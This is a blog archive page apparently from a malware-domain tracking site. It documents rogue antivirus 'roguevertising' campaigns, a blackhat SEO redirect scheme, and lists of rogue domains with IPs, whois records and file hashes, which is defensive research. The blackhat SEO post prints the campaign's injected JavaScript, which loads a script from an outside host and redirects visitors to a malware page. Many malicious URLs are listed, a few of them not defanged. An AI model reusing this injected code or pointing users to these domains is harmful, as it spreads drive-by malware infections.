Archive for the 'Malware Distribution' Category

14
Jun

Introducing: Roguevertising

Introducing: Roguevertising

A new term in the rogue industry – written by Bart Parys


Today I will be talking about a new trend that spreads itself quite quickly throughout the internet.
In this document I will try to explain what it is all about and provide additional information like screenshots and measures that can be taken to tackle these threats.

It all started when I found a new rogue domain:
hxxp://antispyware.com
antispyware.com
Antispyware2010 website

The following domains are associated with Antispyware.com:
hxxp://antispyware2009.com
hxxp://Errorsmart.com
hxxp://Registryclear.com
hxxp://Remover.org

They all introduce the same ‘product’ – to perform a scan for malware on your computer. You can even request Live Technical Support.
(No, not really, it will just refer you to the download page)

When you download their product, you can find the following setup file in your chosen download folder:
setupxv

setupxv.exe

Pending on the website you landed on, you can also download another file called setup.exe

The file setupxv.exe has currently a 53.66% detection ratio on VirusTotal. The classification most used included the name Fakealert:
VirusTotal Result
It is also possible you download a file with the same name (setupxv.exe) but with slightly changed binaries. You can find an example of this on VirusTotal:
VirusTotal Result

For more information about this rogue program and the others described down below, I refer to the end of this document, where you can find some screenshots of my findings.


Then, after performing some Google searches on fake testimonials and information taken from their website , I landed on the following rogue domain:

hxxp://againstadware.com
againstadware.com
AgainstAdware website

Unfortunately, you cannot download their product anymore, as the setup file has been removed.

The following domains are associated with Againstadware.com:

http://Fileboxx.com

http://Incredible-mail-download.com

http://Secureoneantivirus.com

http://Wincleanerpro.com


Now, why am I introducing the term roguevertising ?

You might have heard about malvertising. Malvertising (short for Malicious Advertising)  is a term used for malicious advertisements that are clicked on, and can deliver a drive-by-download or suggesting to install a certain program to clean and scan your computer.

These days I have found a lot of websites using malvertising for rogue security software. That is how the term roguevertising was born.

A few examples of these websites:

hxxp://www.hopelinenc.org/forum/anti-spyware

hxxp://www.thedietsolutionprogram.ws/weblog/anti-spyware

hxxp://www.thedietsolutionprogram.ws/rating/anti-spyware

hxxp://www.perfectoptimizer5.com/?hop=aseafood

hxxp://www.bestspywareprogram.net
antispyware.com roguevertising
Along with legit Antispyware applications, you can find “Antispyware” between the list with … an advertisement leading to the download link of the rogue. (Done through an advertising mirror)

hxxp://threats.browsetag.com/antispyware
hxxp://www.plrarticlesoftware.biz/forum/anti-spyware
hxxp://www.earth4energyoffical.com/weblog/anti-spyware
hxxp://www.earth4energyoffical.com/article/adware-alert
hxxp://www.earth4energyoffical.com/article/privacy-control
hxxp://www.theaffiliatecode.ws/weblog/anti-spyware
hxxp://www.legitonlinejobshome.com/tags/anti-spyware

Additionally, I stumbled upon the following rogue domain:
hxxp://spywareremover.com
spywareremover.com website
SpywareRemover website

When you download their product, you can find the following setup file in your chosen download folder:
SpywareRemover icon
Setupxv.exe

That’s right. Setupxv all over again, but with a different icon and again changed binaries.

The file setupxv.exe has currently a 39.02% detection ratio on VirusTotal. The classification most used included the name AdSpy:
VirusTotal Result


Do you surf the internet ? Does your PC run slow ? Do you get bombarded with annoying pop-up ads ?
Then you are most likely to land on the following page:
Adware Alert homepage
AdwareAlert website

Yet again, setupxv is presented to you with a nice new icon:
AdwareAlert icon

Current VirusTotal detection rate is 48.78% . The file was again changed to avoid detections by Antivirus software. (also introduces another GUI as noted at the end of this document)
VirusTotal Result

The setupxv rogueware campaign is on a roll, down below some associated domains with AdwareAlert.com:

hxxp://Cbadvance.com
hxxp://Errorkiller.com
hxxp://Evidenceeraser.com
hxxp://Malwarebot.com
hxxp://Malwareremovalbot.com
hxxp://Registrybot.com
hxxp://Registrysmart.com
hxxp://Regrecall.com
hxxp://Regsweep.com
hxxp://Spywarebot.com
hxxp://Spywarestop.com


Next rogueware domain on our list is:
hxxp://www.antispywarebotpro.com
AntiSpywarebot homepage
AntiSpywareBot website

As always your download is free as well as the malicious payload:
asbot icon
Setupxv.exe

Current VirusTotal detection rate is 48.78% .
VirusTotal Result

Related domains in this case are:

hxxp://mail.remover.org
hxxp://www.privacycontrolpro.com
hxxp://errorsweeperpro.com
hxxp://Regcleanlite.com
hxxp://www.browsetag.com/spyware/virus/threats
hxxp://support.browsetag.com/certified/antispyware
hxxp://www.spywarenuker-gary.com/blog/anti-spyware
hxxp://www.spywarenuker-gary.com/blog/adware-alert

As you might have noticed, roguevertising is appearing on these last pages. Spywarenuker Gary needs to find another name, as his directory is filled with malicious advertisements and bloatware:
spywarenuker gary directory
Part of a roguevertising directory


I have also gathered the following URLs which are also related to the setupxv rogueware campain:

hxxp://adwarealert.com
hxxp://Cbadvance.com
hxxp://Errorkiller.com
hxxp://Evidenceeraser.com
hxxp://Malwarebot.com
hxxp://Malwareremovalbot.com
hxxp://Registrybot.com
hxxp://Registrysmart.com
hxxp://Regrecall.com
hxxp://Regsweep.com
hxxp://Spywarebot.com
hxxp://Spywareremover.com
hxxp://Spywarestop.com

One of the rogues download above, again setupxv:
Setupxv.exe
Setupxv.exe

This new version of setupxv only has a 4.88% detection ratio on VirusTotal:
VirusTotal Result

… and delivers you the program RegClean
RegClean Setup Wizard
RegClean Setup Wizard


The following rogue that you might remember is Spyware Cease:

hxxp://www.spywarecease.com
SpywareCease website
SpywareCease website

SpywareCease comes in the following setup file:
spywarecease icon

It has currently a 12.20% ratio on VirusTotal:
VirusTotal Result

Associated domains and roguevertising links for Spywarecease.com:

hxxp://www.spycease.com
hxxp://www.micronichefinderhome.com/blog/spyware-cease
hxxp://entrepreneur.useoursite.com/go.php?p=SSPYKILLER
hxxp://offto.net/SpywareCease_4ee8
hxxp://viral-link-exchange.info/clickbank-supercenter/html/spyware-cease-1-converting-anti-spyware-software.htm
hxxp://www.cheapsale.org/html/spyware-cease-1-converting-anti-spyware-software.htm
hxxp://www.easyfixcomputersolutions.com/home.php
hxxp://www.easydigitalsales.com/33027/Spyware-Cease—1-Converting-Anti-Spyware-Software.html


We are moving on to the last roguevertising campaign, brought to you by 007 Anti-Spyware.
I stumbled upon this one while investigating the SpywareCease roguevertising campaign.
hxxp://www.007antispyware.com
Unfortunately (or luckily) this site was down at the time of writing, but I found a roguevertising domain for this one:
hxxp://007antyspyware.blogspot.com
007 Anti-Spyware website (blog)
007 Anti-Spyware website (blog)

The blog provides an ad-provided mirror for the setup file 007antipsyware.exe
007antipsyware.exe
007antipsyware.exe

The file has currently very low detection ratios on Virustotal. Only 4.88% of the scanners detect it,
namely as Adware.SpywareCease. Rings a bell somewhere…
VirusTotal Result

But the fun is not over yet. When visiting this roguevertiser’s Twitter page, you can install the Googod toolbar. Now we can add spyware on the list, since the Googod toolbar is copyrighted under
Conduit Ltd., which is renowned for its spyware activities. This toolbar is available for Internet Explorer, Mozilla Firefox and Safari.

hxxp://www.googod.ourtoolbar.com
Googod toolbar website
Googod toolbar website

2.44% on VirusTotal
VirusTotal Result


Conclusion

Although malvertising is not a new concept, roguevertising however is.
I hope that throughout this document it became a bit clearer what it is all about and how only one rogueware campaign is and will be able to infect a lot of users.
No, the rogueware will not clean nor speed up your computer.

Pushing rogueware downloads through advertisements on weblogs, bloatware websites or even on Google, will be a phenomenon we have to deal with. In this case the setupxv rogueware campaign was able to spread itself through different domains, which can attract users to actually download and install the software.

But there might be hope.In my opinion can websites like Antispyware.com be prevented by ever seeing the light: register domains that can be used for roguevertising. In this case, the setupxv creators would not have been able to register this domain, and users would get a message stating the website is under construction, for example or it is registered for the single purpose of stopping websites like this.
Another option would be for the domain linking to an AntiVirus vendor, as described below.
After all, the site Antispyware.com website sounds legit, and when you visit the site, the user will not notice anything suspicious. For example Antivirus.com is registered to TrendMicro.
When you look up Antispyware.com however, you get a 32 % dangerous rating on URLVoid:
URLVoid Result

Tools like Web Of Trust (WOT) can prevent you from landing on sites like Antispyware.com.
Other manners to prevent this can either be hostfile-based or user-based.
Examples can be MVPS Hosts or Sandboxie. Common sense however will always be the most important factor, just remember the following rule: if it looks like a rogue, it probably is !
This does of course not imply that every suspicious looking program is malicious, rather perform some checks with your favorite search engine or use URLVoid and VirusTotal as a reference.

Further rogueware screenshots are provided down below. Thank you for reading.


007 Antispyware
Setup screen
Setup screen

Shortcut icon
Shortcut icon

Interface
Interface

Adware Alert
Setup screen
Setup screen

Shortcut icon
Shortcut icon

Interface
Interface

Antispyware 2008
Setup screen
Setup screen

Shortcut icon
Shortcut icon

Interface
Interface


007 Antispyware
Setup screen
Setup screen

Shortcut icon
Shortcut icon

Interface
Interface

05
Jul

Blackhat SEO campaign with domains flooding search results-UPDATED

There is a blackhat seo campaign that is redirecting users to fake scanning websites to infect users. Each of these domains has many pages filled with keywords to get high rankings on search pages. Once clicked, the user is redirected to the drive-by download site of the day. You can click on each domain name to view the whois information. Here is a list of some of the domains as well as how it works.

<script type=”text/javascript” src=”/counter?i=x-Di3AgjVhR8ak4on4gk1b2YXOLV8tKk9vfMw_qaRu8alxLqUphKSiBSqzUuyL1vtJUnVRoV
Cp_qCODoee2QvAwsxetjrz1uKFNY2brg”></script>

The following javascript is then loaded…

var t3dbj5es5;if (typeof(encodeURIComponent) == ‘function’) t3dbj5es5 = encodeURIComponent;else if (typeof(escape) == ‘function’) t3dbj5es5 = escape;else t3dbj5es5 = function (text) { return text; };document.write(‘<script src=”http://xozkyaf.com/stat?s=54dpw11f64Bj9qRA;r=’ + (document.referrer ? t3dbj5es5(document.referrer) : ”) + ‘” type=”text/javascript”></script>’);

The contents of the new page is below.

document.location.href=’http://spacefunk.cn/go.php?id=2012&key=b6a0fad62&p=1′;

Redirects to
hxxp://spacefunk.cn/go.php?id=2012&key=b6a0fad62&p=1
Redirects to
Fake scanning page of the day as selected by malware distributers.

ufumtrwz.com 208.73.210.26
rmeged.com 208.87.149.250
stqbcfkjp.com 69.64.147.209
vhwdhjfig.com 69.64.147.210
pazjbw.com 69.64.147.210
rklktu.com 69.64.147.211
nbzqkp.com 69.64.147.212
wqtlto.com 69.64.147.212
klqltr.com 69.64.147.212
obirrd.com 69.64.147.212
qylzioqty.com 69.64.147.213
brohpql.com 69.64.147.214
atoonoyxm.com 69.64.147.215
ilmtvne.com 69.64.147.215
udtlgrzm.com 69.64.147.216
tnkpghmt.com 69.64.147.217
lpstjr.com 69.64.147.217
auvwbkdbe.com 69.64.147.217
colixfpf.com 69.64.155.120
qtltmzq.com 69.64.155.120
tgshpj.com 69.64.155.121
mkutvrah.com 69.64.155.121
nzadvyul.com 69.64.155.121
dvgbuqyg.com 69.64.155.121
nsqaidn.com 69.64.155.122
sambmq.com 69.64.155.122
sgkoqblfp.com 69.64.155.122
gxprzo.com 69.64.155.123
ujqqccmvd.com 69.64.155.124
dhmhcze.com 69.64.155.124
xarhwsvf.com 69.64.155.125
fitvahmz.com 69.64.155.126
vqtxnqmre.com 69.64.155.127
buzstyltd.com 69.64.155.127

UPDATED: 7/5/09

tvciucde.com 174.129.244.106 174.129.241.185
jmguhkxaj.com 194.110.162.82
nhroiv.com 194.110.162.83
gyadqcuoc.com 194.110.162.85
igvutelu.com 194.110.162.86
nqcngszq.com 194.110.162.86
birkkane.com 194.110.162.86
ouvthweg.com 194.110.162.89
vwsevihm.com 194.110.162.94
gakvgp.com 194.110.162.95
onnrdm.com 194.110.162.227

29
Jun

Domains associated with rogue campaigns

These domains are associated with known malware operators. Most of these domains do not yet resolve but probably will over the next couple of months. You can click on each domain to view the whois entry for the domain.

AS41671 194.54.80.0/22
quickspywarescannerv3.com
fastantiviruscheckv2.com
homebodiesmusic.com 195.39.196.44 NS1.S-HOSTING.BIZ NS2.S-HOSTING.BIZ
purchuasebestsoftwareonline.com
buybestsoftwareonline.com
purchuasepremiumprotection.com
purchuasepremiumsoftware.com
buysoftwaresubscription.com
bennysaintscathedral.com
spywareurladvisor.com
satisfatcionvulture.com
malwareurldownload.com
softprodefender.com
cnet-uploads.com
comperhensiveupdates.com
buysecuritysoftwareonline.com

AS19194
antivirussystemfolderscanv3.com 63.223.110.178 NS1.EVERYDNS.NET NS2.EVERYDNS.NET NS3.EVERYDNS.NET NS4.EVERYDNS.NET
winonlinescanner.com 78.47.132.221 NS1.EVERYDNS.NET NS2.EVERYDNS.NET NS3.EVERYDNS.NET NS4.EVERYDNS.NET

AS36351
spywarecomputerscanv2.com 83.133.126.155 NS1.EVERYDNS.NET NS2.EVERYDNS.NET NS3.EVERYDNS.NET NS4.EVERYDNS.NET
antivirusfolderscanner.com

AS15135
explorerantivirusscanner.com
explorerfilescan.com

AS30968
arskoe.com 77.221.148.178 NS21.DNS-RUS.NET NS22.DNS-RUS.NET

This information was sent to us. Thanks to everyone that contributes to MDB.

23
Jun

Fake codec website: update-adobe.fdns.net

hxxp://nevvsvine.com/go.php?sid=6
Redirects to
hxxp://q5.awardspace.com/

awardspace.com and fdns.net are legimate hosts with accounts that are being used to host and redirect to malware.

codec.exe
Result: 30/41 (73.17%)
MD5: d44b9453d4aca0a4e309fb5708b107d0
VirusTotal
ThreatExpert Analysis
hxxp://update-adobe.fdns.net/codec/

23
Jun

New rogue domain: scanmyfolders.com

hxxp://scanmyfolders.com/1/?id=2022&query=d9be45bbe&back=%3DjQ32jT3NYQNMI%3DM

Whois entry for scanmyfolders.com 91.212.65.125
Name: Phil W Jackie
Address: 140 Nguyen Truong To Street
City: Hoi An City
Province/state: Quang Nam Province
Country: VN
Postal Code: 05104

Setup-1581_02022.exe
Result: 1/41 (2.44%)
MD5: 0b7cea172a3fa4f6586bb5dbf7c94f99
VirusTotal
ThreatExpert Analysis
hxxp://scanmyfolders.com/download/

22
Jun

New malware domain: filedeepsea.com

http://tubeworldsonline.com/xplays.php?id=40014&name=wimbledon+2009+tv+schedule

Whois entry for filedeepsea.com 64.20.38.171
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note – All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

streamviewer.40014.exe
Result: 1/41 (2.44%)
MD5: 798541ec243e38fa6590c61f36c828e2
VirusTotal
ThreatExpert Analysis
hxxp://filedeepsea.com/

21
Jun

New rogue domain: scaninto4.info

hxxp://scaninto4.info/22/?uid=1340

Whois entry for autofileportal.com 64.20.38.171
Registrant Name:James LaCroix
Registrant Organization:
Registrant Street1:1307 Ocean Ave
Registrant Street2:
Registrant Street3:
Registrant City:Brigantine
Registrant State/Province:NJ
Registrant Postal Code:08203
Registrant Country:US
Registrant Phone:+1.6093492150
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:jlcroix@gmail.com

install.exe
Result: 10/41 (24.4%)
MD5: 9d247408d6186e88b1c0856ac0415185
VirusTotal
ThreatExpert Analysis
hxxp://scaninto4.info/download/install.php

18
Jun

New rogue domain: niprotect.com

hxxp://niprotect.com/index.php?affid=02971

Whois entry for niprotect.com 89.149.212.217
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note – All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

install.exe
Result: 10/40 (25%)
MD5: b9ec3d834a9b073bf6e86985cdc26f9a
VirusTotal
ThreatExpert Analysis
hxxp://niprotect.com/download.php?affid=02971




SANDBOX

SANDBOX ANALYSIS PAGE




 

September 2010
M T W T F S S
« Aug    
 12345
6789101112
13141516171819
20212223242526
27282930